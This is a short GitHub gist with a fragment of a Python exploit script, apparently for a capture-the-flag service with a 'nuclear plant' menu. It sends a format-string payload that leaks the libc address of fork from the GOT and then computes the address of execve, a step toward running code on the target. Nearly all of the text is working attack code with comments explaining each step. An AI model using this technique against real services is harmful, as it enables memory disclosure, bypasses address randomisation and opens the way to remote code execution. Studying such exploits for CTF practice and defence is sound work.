@vanhoefm vanhoefm/gist:5305882
Last active Dec 15, 2015

# Step 1c --- Get the address of execve
# Helpers assumed to be defined elsewhere in the full script:
#   dword_to_bitstring / bitstring_to_dword (4-byte little-endian pack/unpack),
#   nc (socket wrapper), location_got_fork (address of fork's GOT entry).
# The name field is printed back through printf, so "%22$s" dereferences the
# 22nd stack argument, i.e. the GOT address placed at the start of the buffer.
LEAKFORKADDR = dword_to_bitstring(location_got_fork)
LEAKFORKADDR += "%22$s:ENFORK:"
nc.read_until("Your choice: ")
nc.write("1" + "\n")
nc.read_until("Insert name: ")
# Pad the name to 100 bytes; trailing bytes fill the remaining fields of the struct.
nc.write(LEAKFORKADDR + "A" * (100 - len(LEAKFORKADDR)) + "\x01\x01" * 4 + "\xFF\xFF" + "\n")
nc.read_until("Uranium in nuclear plant \"")
# Output is: 4 raw address bytes, the leaked GOT contents, then ":ENFORK:" (8 bytes).
addrfork = bitstring_to_dword(nc.read_until(":ENFORK:")[4:-8])
# execve sits at a fixed offset from fork in this libc build.
addrexecve = addrfork + 0x320
print "[+] Address of fork :", hex(addrfork)
print " > Address of execve :", hex(addrexecve)